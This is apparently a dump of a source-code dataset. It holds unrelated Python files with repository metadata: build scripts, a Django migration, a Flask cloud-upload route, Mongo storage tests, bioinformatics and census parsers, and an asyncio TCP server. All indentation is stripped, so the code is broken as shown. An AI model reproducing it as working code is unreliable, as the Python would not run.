scripts = module.get('scripts')
resources = self.descriptors.module_resources(module_name)
module_dir = join(self.application_dir, module_name)
output = StringIO()
if scripts:
modular_build.concatenate_scripts(scripts, module_dir, self.output_dir, output)
if resources:
self._write_module_resources(resources, output)
output_file_path = concatenated_module_filename(module_name, self.output_dir)
write_file(output_file_path, minify_js(output.getvalue()))
output.close()
# Outputs:
# <app_name>.html as-is
# <app_name>.js as-is
# <module_name>/<all_files>
class DebugBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
js_name = self.app_file('js')
src_name = join(os.getcwd(), self.application_dir, js_name)
symlink_or_copy_file(src_name, join(self.output_dir, js_name), True)
for module_name in self.descriptors.modules:
module = self.descriptors.modules[module_name]
input_module_dir = join(self.application_dir, module_name)
output_module_dir = join(self.output_dir, module_name)
symlink_or_copy_dir(input_module_dir, output_module_dir)
def _build_html(self):
html_name = self.app_file('html')
symlink_or_copy_file(join(os.getcwd(), self.application_dir, html_name), join(self.output_dir, html_name), True)
def build_application(application_name, loader, application_dir, output_dir, release_mode):
descriptors = loader.load_application(application_name + '.json')
if release_mode:
builder = ReleaseBuilder(application_name, descriptors, application_dir, output_dir)
else:
builder = DebugBuilder(application_name, descriptors, application_dir, output_dir)
builder.build_app()
| [
"[email protected]"
] | |
729aafbd622a90e8bebf023ef2424d3fcf61b70c | afea9757be324c8def68955a12be11d71ce6ad35 | /willyanealves/services/migrations/0014_auto_20201209_1623.py | aa5563d97e9d3dbc154b4da10bedc96ae1265e5e | [] | no_license | bergpb/willyane-alves | c713cac3ec3a68005f3b8145985693d2477ba706 | 8b2b9922ba35bf2043f2345228f03d80dbd01098 | refs/heads/master | 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # Generated by Django 3.1.2 on 2020-12-09 19:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('stock', '0001_initial'),
('services', '0013_remove_kititem_price'),
]
operations = [
migrations.AlterField(
model_name='kititem',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stockitem', to='stock.stock'),
),
]
| [
"[email protected]"
] | |
aca6cfcb482c568e01a5e582aa8c9f728f17fa4b | 3075d466d4482281fbff51bd71dd4e1c11aae7ee | /src/SintacticoSemantico.py | 479ef6f0bcba71872a8f84740609e1c6f2f1c522 | [] | no_license | AndresRQ27/LESCO-Translator | 97c68f6a74826ac8bda8f2a768856f88e87733dc | 50f487fca45e9a1f7e5697224ba72ace79d65802 | refs/heads/master | 2020-03-07T03:36:28.543380 | 2018-10-20T16:24:26 | 2018-10-20T16:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # coding=utf-8
def semantico(lista):
palabras = sintactico(lista)
t = pronombre(palabras)
r = pregunta(palabras[0])
palabras[0] = palabras[0][0].upper()+palabras[0][1:]
v = posVerb(palabras)
if(palabras != ""):
if(r[0]):
palabras[0] = "¿"+palabras[0]
if(t[0]):
palabras[v] = fixVerb(t[1],palabras)
else:
palabras[1] = fixVerb("usted", palabras)
palabras[len(palabras)-1] = palabras[len(palabras)-1]+"?"
print str(palabras)
return palabras
elif(t[0]):
if(t[0]):
if(palabras[t[2]+1]!=""):
palabras[t[2]] = t[1]
palabras[v] = fixVerb(t[1], palabras)
else:
print("no hay verbo")
print str(palabras)
return palabras
else:
print str(palabras)
return palabras
def posVerb(palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","comer", "llamar", "cumplir", ""]
n = -1
for x in range(0,len(palabras)):
for y in verb:
if(palabras[x]==y):
n = x
return n
def pronombre(palabras):
exc = ["yo", "usted", "ustedes", "nosotros", "ellos","él", "ella"]
x = False
y = ""
n = 0
for e in exc:
for w in range(len(palabras)):
if(e == palabras[w]):
if(palabras[w+1]=="nombre"):
if(e=="yo"):
e = "mi"
elif(e=="usted"):
e = "su"
else:
e = "sus"
x = True
y = e
n = w
print(y)
return [x,y,n]
def pregunta(palabra):
preg = ["donde","cual","que","como","cuando","porque"]
t = False
w = ""
for x in preg:
if(x == palabra):
t = True
w = x
print(x)
return [t,w]
def fixVerb(pron, palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","llamar","cumplir", ""]
conjY = ["soy", "estoy", "voy","vengo","tengo", "hago", "digo","llamo","cumplo"]
conjEEU = ["es", "está", "va","viene","tiene", "hace", "dice","llama", "cumple"]
conUs = ["son", "están", "van","vienen", "tienen", "hacen", "dicen","llaman", "cumplen"]
conN = ["somos","estamos", "vamos","venimos", "tenemos", "hacemos", "decimos","llamamos", "cumplimos"]
w = ""
for x in palabras:
for y in range(0,len(verb)):
if(x == verb[y]):
if(pron == "él" or pron == "ella" or pron == "usted" or pron == "mi" or pron == "su"):
w = conjEEU[y]
elif(pron == "yo"):
w = conjY[y]
elif(pron == "ustedes" or pron == "sus"):
w = conUs[y]
else:
w = conN[y]
return w
def sintactico(palabras):
n = 0
res = []
for x in range(0,len(palabras)):
w = ""
if(palabras[x] == " "):
for y in range(n,x):
if(palabras[y]=="10" and palabras[y+1]!=" "):
s = int(10)+int(palabras[y+1])
k = str(s)
w += k
elif(palabras[y-1]=="10"):
"suma"
else:
if(palabras[y]!=w or w.isdigit()):
w += palabras[y]
n = x +1
res += [w]
w = ""
return res
| [
"[email protected]"
] | |
ce17d3e628bbb39aa428a1fe21da1b9f4d08ce1d | 9f3365f168dc94f8009f6586a58dc536b2af6921 | /controller/oss.py | 9a8cb7996f6e745ce6d81f7397212f9de6da0a71 | [] | no_license | qmaxlambda/backend | 80d9ad8999431c4357e5a20e110c250f8809552e | 6f2a8ad9daff03499699d146015dc9f15a7f5448 | refs/heads/master | 2023-01-23T05:54:41.503490 | 2020-12-11T03:57:28 | 2020-12-11T03:57:28 | 311,026,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | # -*- coding: utf-8 -*-
# @Time : 2020/11/8 下午 04:59
# @Author : Mason
# @Email : [email protected]
# @File : oss.py
# @Software: PyCharm
import json
import os
import oss2
from flask import request, Blueprint
from Config import config
from util.jsons import js_ret
oss_bp = Blueprint('oss',__name__)
access_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', config.ACCESSKEY_ID)
access_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', config.ACCESSKEY_SCRECT)
bucket_name = os.getenv('OSS_TEST_BUCKET', config.BUCKET_NAME)
endpoint = os.getenv('OSS_TEST_ENDPOINT', config.ENDPOINT)
# 确认参数
for param in (access_key_id, access_key_secret, bucket_name, endpoint):
assert '<' not in param, '请设置参数:' + param
# 创建Bucket对象
bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)
@oss_bp.route('/update',methods=["GET", "POST"])
def update():
# 上传文件到服务器
file = request.files.get('file')
if file is None:
return js_ret(0,'没有检索到文件')
else:
# 上传文件到阿里云OSS
res = bucket.put_object(file.filename, file)
if res.status == 200:
# 上传成功,获取文件带签名的地址,返回给前端
url = bucket.sign_url('GET', file.filename, 60)
data = {
"url":url
}
return js_ret(1,"",data)
| [
"[email protected]"
] | |
fd08376b9c08c60bb8b11cd622e7317f4e26a932 | 722b35b7617e5b715b964419eb81de1c8958c4d1 | /locacoes/apps.py | 4e2edd5bf82f1453d7cc05d7206ffe50fae2a85a | [] | no_license | gugajung/StarVideo | 83dad32e256ce4335debc9df27be9b75e9cd32ce | 44bab79c5bc3abb3d27d519bc13ece304f28672b | refs/heads/master | 2020-09-27T03:43:56.327484 | 2019-11-19T18:19:03 | 2019-11-19T18:19:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | """
Apps: App 'locacoes'
"""
from django.apps import AppConfig
class LocacoesConfig(AppConfig):
name = 'locacoes'
| [
"[email protected]"
] | |
e6215762208ab16d0230d27ae2bd2259e021ac48 | 830837f1ca1a4d090f9979f1d448017cbf88065c | /tutorial/quickstart/views.py | eede40c2e82a5d2cee4c62f62a4c009e8e4fd883 | [] | no_license | arshadansari27/django-angular | 3bd32a937cc6f0977d00fb7fe93203011aec786e | 558472df5071dc93973173ae83aefbac0eb4fdc4 | refs/heads/master | 2016-08-12T03:34:54.079002 | 2015-11-26T08:20:36 | 2015-11-26T08:20:36 | 46,878,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from tutorial.quickstart.serializers import UserSerializer, GroupSerializer
from django.shortcuts import render
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
| [
"[email protected]"
] | |
c91563eee6c60960746a34671256bdc380a91e08 | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/test/programytest/storage/stores/nosql/mongo/store/test_sets.py | b4a1ce00829727f91194650b0127c7d2bb059299 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,711 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programytest.storage.asserts.store.assert_sets import SetStoreAsserts
from programy.storage.stores.nosql.mongo.store.sets import MongoSetsStore
from programy.storage.stores.nosql.mongo.engine import MongoStorageEngine
from programy.storage.stores.nosql.mongo.config import MongoStorageConfiguration
import programytest.storage.engines as Engines
class MongoSetsStoreTests(SetStoreAsserts):
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_initialise(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_set_storage(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_set_storage(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_from_text(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_text(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_from_text_file(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_text_file(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_text_files_from_directory_no_subdir(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_text_files_from_directory_no_subdir(store)
@unittest.skip("CSV not supported yet")
def test_upload_from_csv_file(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_csv_file(store)
@unittest.skip("CSV not supported yet")
def test_upload_csv_files_from_directory_with_subdir(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_csv_files_from_directory_with_subdir(store)
| [
"[email protected]"
] | |
097abd80763e1b42f4d5a68c9500b5438fdc4a1e | 748cbfda91c8088c8feac93f0dac884a0d334e1c | /jaspar.py | 836b84189a87fefd25d408829b74dd56eea8d398 | [] | no_license | jlwetzel/zfcode | e2aca0b8661079734953cb3d1a9970e2939e1584 | 52e6fba51dbe74d5da9871cbaf28dbc24b7ccad7 | refs/heads/master | 2020-06-30T02:54:17.754259 | 2013-07-30T23:57:27 | 2013-07-30T23:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,003 | py | # Code for reteiving and maniupulating the JASPAR sql_table files
# and the JASPAR PWM file.
import os
JASPAR_BUILD = '2009-Oct12-NonRedundant'
prefix = '../data/JASPAR/' + JASPAR_BUILD
protTab = prefix + '/sql_tables/MATRIX_PROTEIN.txt'
annotTab = prefix + '/sql_tables/MATRIX_ANNOTATION.txt'
speciesTab = prefix + '/sql_tables/MATRIX_SPECIES.txt'
matrixTab = prefix + '/sql_tables/MATRIX.txt'
PWMfile = prefix + '/matrix_only.txt'
def getNewBuild():
# Get the latest build of the complete JASPAR CORE set.
# First set up directory structure in ../data/JASPAR/
JASPAR_HTML_PREFIX = "http://jaspar.genereg.net//" + \
"html/DOWNLOAD/jaspar_CORE/non_redundant/all_species/"
sqlTables = ["MATRIX.txt", "MATRIX_ANNOTATION.txt", "MATRIX_DATA.txt",
"MATRIX_PROTEIN.txt", "MATRIX_SPECIES.txt"]
os.mkdir("../data/JASPAR/" + JASPAR_BUILD)
os.mkdir("../data/JASPAR/" + JASPAR_BUILD + "/sql_tables")
for tab in sqlTables:
os.system("wget -P " + prefix + "/sql_tables/ " +
JASPAR_HTML_PREFIX + "/sql_tables/" + tab)
os.system("wget -P " + prefix + " " + JASPAR_HTML_PREFIX
+ "matrix_only/matrix_only.txt")
def getIDsByAnnot(annot, currentList = None):
# Returns a list of JASPAR unique IDs that are are
# labelled by the annots. annots is tuple (key, value)
if currentList == None:
ids = set()
else:
ids = set(currentList)
annotFile = open(annotTab, 'r')
for line in annotFile:
sp_line = line.strip().split('\t')
if len(sp_line) < 3:
continue
key = sp_line[1]
val = sp_line[2]
if key == annot[0] and val == annot[1]:
ids.add(sp_line[0])
annotFile.close()
ids = list(ids)
ids = [int(i) for i in ids]
return sorted(list(ids))
def JASPARIDs2proteinIDs(JASPARids):
# Takes a sorted list of JASPAR IDs and
# returns a list of the corresponding protein IDs
protFile = open(protTab, 'r')
i = 0
proteinIDs = []
for line in protFile:
sp_line = line.strip().split()
if int(sp_line[0]) == JASPARids[i]:
proteinIDs.append(sp_line[1])
i += 1
if i == len(JASPARids):
break
protFile.close()
return proteinIDs
def getAnnotsByJASPARid(JASPARids, label):
# Finds the annotation associated with the JasparID
# and label for each ID in the ***SORTED***
# list of sorted JASPARids
annotFile = open(annotTab, 'r')
i = 0
vals = []
for line in annotFile:
if len(line) != 0:
sp_line = line.strip().split('\t')
if int(sp_line[0]) > JASPARids[i]:
print "No label: %s for JASPAR id %d" %(label, JASPARids[i])
i += 1
if i == len(JASPARids):
break
if int(sp_line[0]) == JASPARids[i] and sp_line[1] == label:
vals.append(sp_line[2])
i += 1
if i == len(JASPARids):
break
annotFile.close()
return vals
def main():
#getNewBuild()
JASPARids = getIDsByAnnot(('family', 'BetaBetaAlpha-zinc finger'))
print JASPARids
x = getAnnotsByJASPARid(JASPARids, "family")
#protIDs = JASPARIDs2proteinIDs(JASPARids)
#print(len(protIDs))
for t in x:
print t
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2d220c223d8de7d4b6a23be7c9e63a51b4fe4af8 | 05f759e98eefcb7962f3df768fc6e77192311188 | /prepro.py | e276e2d990eb9a35f4fef940fdc81b9d31ad80dc | [
"Apache-2.0"
] | permissive | 1048693172/transformer | 17c76605beb350a7a1d6fe50a46b3fbbefb16269 | fd26fab9a4e36816223d80e8287c0b08a6d645d0 | refs/heads/master | 2020-04-15T17:44:58.943322 | 2019-01-09T15:14:40 | 2019-01-09T15:14:40 | 164,885,732 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | # -*- coding: utf-8 -*-
#/usr/bin/python2
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
'''
from __future__ import print_function
from hyperparams import Hyperparams as hp
import tensorflow as tf
import numpy as np
import codecs
import os
import regex
from collections import Counter
def make_vocab(fpath, fname):
'''Constructs vocabulary.
Args:
fpath: A string. Input file path.
fname: A string. Output file name.
Writes vocabulary line by line to `preprocessed/fname`
'''
text = codecs.open(fpath, 'r', 'utf-8').read()
#text = regex.sub("[^\s\p{Latin}']", "", text)
words = text.split()
word2cnt = Counter(words)
if not os.path.exists('preprocessed'):
os.mkdir('preprocessed')
with codecs.open('preprocessed/{}'.format(fname), 'w', 'utf-8') as fout:
fout.write("{}\t1000000000\n{}\t1000000000\n{}\t1000000000\n{}\t1000000000\n".format("<PAD>", "<UNK>", "<S>", "</S>"))
for word, cnt in word2cnt.most_common(len(word2cnt)):
fout.write(u"{}\t{}\n".format(word, cnt))
if __name__ == '__main__':
make_vocab(hp.source_train, "de.vocab.tsv")
make_vocab(hp.target_train, "en.vocab.tsv")
print("Done") | [
"[email protected]"
] | |
7f370a2f39867e89d89ab28e23fdbd1bf78c5c33 | affb8d9028f52201dc56dff947502134dcac3066 | /class-06/demo/big_O.py | a4cb31e5067e800c86925b9dfb3be4fe661ec627 | [] | no_license | maisjamil1/amman-python-401d1 | 10aa4d81c9082fbdf18badc3de060ce1d5309e1a | 25c37a5a7c023b5a24ba7a6cc303338b62548f83 | refs/heads/master | 2022-12-28T19:23:11.143932 | 2020-10-13T11:58:30 | 2020-10-13T11:58:30 | 287,927,879 | 0 | 0 | null | 2020-08-16T11:11:27 | 2020-08-16T11:11:27 | null | UTF-8 | Python | false | false | 2,410 | py | # Measure # of operations
n = 7 #1 operation
for i in range(n):
print(i) # n operations
# n+1 operations
# n = 5 > 6
# n = 100 > 101
# n = 1000000 > 1000001
# O(n+1)
# O(n)
def testing_bigoh(n):
for i in range(n):
for j in range(n):
print(i,j) # n*n (n^2)
# testing_bigoh(8)
# O(n^2)
nums1 = [2, 5, 8, 9, 43, 7]
nums2 = [-4, 43, 7, 8, 13, 45]
# One Loop
# Return a list of all items bigger than number in unsorted list
def find_nums_above(nums_list, number):
result = [] # 1 operation
for num in nums_list: # n times
if num > number:
result.append(num) # 1 operation -- 1 extra space
elif num < number:
print("Less")
else:
print("Else")
print("Done with current iteration") # 1 operation
return result # 1 operation
print(find_nums_above(nums1, 10))
# O(2*n+1+1) => O(2n+2)
# O(n)
# O(n) spaces
def find_nums_above_loop_inside(nums_list, number):
result = [] # 1 operation
for num in nums_list: # n times
if num > number:
result.append(num) # 1 operation
elif num < number:
print("Less") # 1 op
for j in range(len(nums_list)): # n times
print("Just for fun") # 1 op
else:
print("Else") # 1 op
print("Done with current iteration") # 1 operation
return result # 1 operation
# O(1 + n (1+ (1 or 1+n or 1) ) + 1)
# O(1 + n (1+ 1+n) + 1)
# O(1 + n(2+n) +1)
# O(2 + 2n^2)
# O(2n^2)
# O(n^2)
print(find_nums_above_loop_inside(nums1, 10))
def tricky_example(a):
print("Hi") # 1 op
print (3*4*6/2) # 1 op
a.sort() # Hidden loop (n*log(n)) -- Merge sort
print(a) # 1 op
print("The end") # 1 op
# O(4 + sort-big-oh)
# O(sort-big-oh)
a = [4,7,2,9,5,0,3]
# Binary Search
# O(log n)
# We divide the array into two halfes and we elimate one of them
sorted_list = [-1, 4, 6, 9, 23, 30, 45, 65, 76, 77, 90]
def binary_search(sorted_nums, target):
min = 0 # 1 space
max = len(sorted_nums)-1 # 1 space
while max>min:
pivot = (max+min)//2 # 1 space
print(max, min, pivot)
if target == sorted_nums[pivot]:
return pivot
elif target < sorted_nums[pivot]:
max = pivot-1
else:
min = pivot+1
return -1
print(binary_search(sorted_list, -1))
# O(3) spaces
# O(1)
# O(3*log n ) spaces
# O(log n)
def fib(i):
# base cases
return fib(i-1) + fib(i-2)
# fib(4) = fib(3) + fib(2)
# We recreate i variable in every recursive call
| [
"[email protected]"
] | |
dcd0da39888cc54780f3269f3b421d663fbe0369 | 12d0f444452d3b2218cd270756283a0463d3e796 | /sg/models/genome_evaluator.py | ebfcee9c68636525d62cd1370f29350bfbce32e0 | [] | no_license | dal3006/load_forecasting-1 | 107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1 | d324a711a1a0c7ccd9587e0ecf9988a12214a1a3 | refs/heads/master | 2023-03-17T07:44:43.487863 | 2015-03-12T15:24:37 | 2015-03-12T15:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,873 | py | """Use this program to evaluate one genome at a time, read from standard
input."""
import sys
import ast
import traceback
import random
import matplotlib.pyplot as plt
import sg.utils.pyevolve_utils as pu
import sg.utils
import ga
import sg.data.sintef.userloads as ul
import load_prediction as lp
from load_prediction_ar import *
from load_prediction_ar24 import *
from load_prediction_arima import *
from load_prediction_dshw import *
from load_prediction_esn import *
from load_prediction_esn24 import *
try:
from load_prediction_CBR import *
from load_prediction_wavelet import *
from load_prediction_wavelet24 import *
except ImportError:
print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed."
options = None
def get_options():
global options
parser = lp.prediction_options()
parser = lp.ga_options(parser)
parser = lp.data_options(parser)
parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None)
parser.add_option("--test-set", dest="test_set", action="store_true",
help="Test the genomes on the test set, rather than on the training set", default=False)
parser.add_option("--plot", dest="plot", action="store_true",
help="Make a plot (in combination with --test-set)", default=False)
(options, args) = parser.parse_args()
lp.options = options
if options.model is None:
print >>sys.stderr, "Model argument is required."
sys.exit(1)
def read_next_genome_list():
print "Enter genome to be evaluated: "
line = sys.stdin.readline()
if line == "":
print "End of input, exiting."
sys.exit(0)
return ast.literal_eval(line)
def next_indiv():
gl = read_next_genome_list()
genome = pu.AllelesGenome()
genome.setInternalList(gl)
genome.setParams(num_trials=options.num_trials)
return genome
def gene_test_loop(model):
while sys.stdin:
ga._model = model
indiv = next_indiv()
if options.test_set:
print "Evaluating genome on test set: ", indiv[:]
sys.stdout.flush()
try:
(target, predictions) = lp.parallel_test_genome(indiv, model) if options.parallel else lp.test_genome(indiv, model)
except Exception, e:
print >>sys.stderr, "Exception raised, failed to evaluate genome."
tb = " " + traceback.format_exc(limit=50)[:-1]
print >>sys.stderr, tb.replace("\n", "\n ")
continue
error = sg.utils.concat_and_calc_error(predictions, target, model.error_func)
print "Error on test phase: {}".format(error)
if options.plot:
sg.utils.plot_target_predictions(target, predictions)
plt.show()
else:
print "Evaluating genome on training set: ", indiv[:]
sys.stdout.flush()
fitness = ga._fitness(indiv)
print "Fitness:", fitness
if fitness != 0:
print "Error:", ga._fitness_to_error(fitness)
else:
print "Error not calculated for 0 fitness."
def run():
"""."""
get_options()
prev_handler = np.seterrcall(lp.float_err_handler)
prev_err = np.seterr(all='call')
np.seterr(under='ignore')
random.seed(options.seed)
np.random.seed(options.seed)
model_creator = eval(options.model + "(options)")
model = model_creator.get_model()
lp._print_sim_context(model._dataset)
print "Number of training sequences: %d" % options.num_trials
print "Start days of training sequences:", model._dataset.train_periods_desc
gene_test_loop(model)
ul.tempfeeder_exp().close()
if __name__ == "__main__":
run()
| [
"[email protected]"
] | |
5aa4ab44e8db688f1fcc7c5792a3d330f805cc4b | e214193fdbc342ce1b84ad4f35bd6d64de7a8767 | /bsn/common/tcp_server.py | af016b7a5eaa3c469a037f78f5023f18cf39703e | [] | no_license | bsn069/py | 78f791dab87c3246a1a173263a703c63c543c8ad | 3b6c2070d38f61eb8511495d38b1cec522ad6de7 | refs/heads/master | 2020-03-10T04:30:00.282303 | 2018-10-07T15:29:45 | 2018-10-07T15:29:45 | 129,193,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from bsn.common import file_import_tree
file_import_tree.file_begin(__name__)
import asyncio
from bsn.common.ip_port import CIPPort
from bsn.common.ip import CIP
from bsn.common.port import CPort
from bsn.common import err
import logging
import enum
from bsn.common import tcp_accept
class EState(enum.Enum):
Null = 0
ParseIPPort = 1
Listened = 2
class CTCPServer(tcp_accept.CTCPAccept):
def __init__(self, loop):
logging.info("{}".format(self))
super().__init__(loop)
self._EStateCTCPServer = EState.Null
async def _parse_ip_port(self):
logging.info("{}".format(self))
self._CIP = CIP('0.0.0.0')
self._CPort = CPort(10001)
await asyncio.sleep(1)
async def _run(self):
logging.info("{}".format(self))
await asyncio.sleep(10)
async def run(self):
logging.info("{}".format(self))
if self._EStateCTCPServer != EState.Null:
raise err.ErrState(self._EStateCTCPServer)
try:
await self._parse_ip_port()
self._EStateCTCPServer = EState.ParseIPPort
await self.start_listen()
self._EStateCTCPServer = EState.Listened
await self._run()
logging.info("{} run end".format(self))
except Exception as e:
logging.error(e)
if self._EStateCTCPServer.value > EState.Listened.value:
await self.stop_listen()
if self._EStateCTCPServer.value > EState.ParseIPPort.value:
self._CIP = None
self._CPort = None
self._EStateCTCPServer = EState.Null
@property
def estate_tcp_server(self):
return self._EStateCTCPServer
file_import_tree.file_end(__name__)
| [
"[email protected]"
] | |
6db8075e420794f1f1c675a8d8c85b56937e0f2f | 3240f07f724583313f154ca52d617447a582fa60 | /python-village/conditions-and-loops/ini4.py | 2c52ceaed225258b96b4f4581e6e097d3ae319fa | [
"MIT"
] | permissive | uabua/rosalind | 65b7bf312a1d826e6863ff84f61b43a7c7b3d8bb | 37b3b1a1ef2a245f979ce1c2f08c4d7535d38195 | refs/heads/master | 2021-08-18T22:41:28.360916 | 2021-02-20T19:21:32 | 2021-02-20T19:21:32 | 245,150,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | """
ID: INI4
Title: Conditions and Loops
URL: http://rosalind.info/problems/ini4/
"""
def sum_of_odd_integers(start, end):
"""
Counts the sum of all odd integers from start through end, inclusively.
Args:
start (int): starting number in range.
end (int): ending number in range.
Returns:
int: the sum of all odd integers from start through end, inclusively.
"""
if start % 2 == 0:
start += 1
sum_of_numbers = 0
for number in range(start, end+1, 2):
sum_of_numbers += number
return sum_of_numbers
| [
"[email protected]"
] | |
93106b10ac49c4459a2aba027ec3a84d8b8ae976 | ebb4b093fe5b0f1d806ad5b566d80eee0a63148e | /citydata/parse_census.py | a653771485315e3e460da679736118e3599a332a | [] | no_license | kris-samala/LBSN | b8d8e8660afed0e67870ba31ee9532dde72d3f4e | 9005e66df22cb2fb7ff8da64baddbb399e8c975c | refs/heads/master | 2020-12-24T13:36:00.649302 | 2012-06-07T06:27:10 | 2012-06-07T06:27:10 | 3,608,883 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import sys
import fileinput
import pickle
#python parse_census.py [state_abbr] [census_raw] census.out
out = open(sys.argv[3], 'wb')
census = {}
state_abb = {}
if len(sys.argv) < 4:
print "Filename required."
else:
for line in fileinput.input(sys.argv[1]):
line = line.split(',')
state_abb[line[0]] = line[1]
for line in fileinput.input(sys.argv[2]):
line = line.split(',')
city = line[2].lstrip('"')
city = city.replace('city','').replace('village','').replace('CDP','').replace('town','').replace('municipality','').replace('zona urbana','').rstrip()
state = line[3].lstrip().rstrip('"')
state = state_abb[state].rstrip()
pop = line[4]
loc = city + "," + state
census[loc] = int(pop)
for l in census:
out.write(l + " = " + str(census[l]) + "\n")
out.close()
pickle.dump(census, open('census.p', 'wb'))
| [
"[email protected]"
] | |
ed2d0c4a5ef120704b2f17e4f84a75fac344740a | 6c53b41340bcacd08b2cbb01214f20beab27fe6b | /env/bin/symilar | db333a323b6132593cc12b208bbc4246dfe55f95 | [
"MIT"
] | permissive | daydroidmuchiri/News-Highlight | 8a9e71ed284622d78a1bdff0e1d4fc26bc999c89 | ab7a9ea7bd29c8ca37e8f923af310999fd4cecde | refs/heads/master | 2021-06-24T17:32:37.913494 | 2019-10-22T07:41:03 | 2019-10-22T07:41:03 | 214,965,319 | 0 | 0 | null | 2021-03-20T02:00:37 | 2019-10-14T06:31:26 | Python | UTF-8 | Python | false | false | 275 | #!/home/daniel/Desktop/python/projects/co/news-highlight/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
| [
"[email protected]"
] | ||
b8d0505385eafd32d112698612fb8469b9c0428a | f06336d8ffcc6028679dff525c60f056f0436e92 | /ChatAj/ChatAj/asgi.py | c257802471be095579816096409cebce83be6805 | [] | no_license | AngelJadan/Primeras-Practicas-con-django | 440fc7efe9c6e49274294765714703ab1c936f8c | fe89c57b16eddb5dcce131212ac5dc3035f41303 | refs/heads/main | 2023-08-19T16:32:19.854395 | 2021-10-14T19:54:51 | 2021-10-14T19:54:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for ChatAj project.
It exposes the ASGI callable as a module-level variable named ``application``.
